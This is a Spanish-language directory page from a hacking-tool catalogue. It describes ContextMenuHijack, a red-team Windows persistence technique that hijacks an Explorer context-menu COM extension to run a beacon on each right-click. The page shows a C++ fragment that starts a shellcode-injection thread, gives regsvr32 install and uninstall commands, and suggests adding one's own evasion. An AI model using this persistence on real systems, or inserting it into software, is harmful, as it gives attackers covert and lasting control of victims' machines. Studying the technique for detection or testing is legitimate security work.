Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ContextMenuHijack — Ejecuta un payload en cada clic derecho sobre un archivo/carpeta en el menú del explorador para persistencia. | Kitploit
Herramientas/GitHubGitHub/ristbs/contextmenuhijack
Mecanismos de PersistenciaPost-ExplotaciónRed TeamingDesarrollo de Payloads
GitHubristbs/contextmenuhijack

ContextMenuHijack

Ejecuta un payload en cada clic derecho sobre un archivo/carpeta en el menú del explorador para persistencia.

Ver Repositorio
17327hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ContextMenuHijack

Esta idea original que me inspiró es de @NinjaParanoid:

Video

ContextMenuHijack es una técnica de persistencia sencilla que utiliza el secuestro de COM basado en el comportamiento humano: cuando haces clic derecho sobre un archivo/carpeta en el Explorador de archivos para abrir el menú contextual, ejecuta al mismo tiempo el beacon que hayamos especificado.

root@kitploit:~
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
	if (pidlFolder != NULL) {
	}
        return S_OK;
    }
    return S_OK;
}

Uso

Solo tienes que cargar el archivo de solución (.sln) y compilarlo. Es importante saber que necesitas privilegios de administrador para usar esta técnica de persistencia. Una vez hayas hecho todo esto, solo tienes que registrar el archivo DLL en el registro con regsvr32:

root@kitploit:~
regsvr32 "C:\path\to\ContextMenuHijack.dll"

si quieres desinstalarlo, solo usa el flag /u

root@kitploit:~
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

persistence1

  • esta técnica puede detectarse fácilmente desde la pila de subprocesos de explorer.exe; depende de ti usar tus propias técnicas de evasión image

Créditos

  • https://github.com/rikka0w0/ExplorerContextMenuTweaker
  • https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
  • https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
Descargar herramienta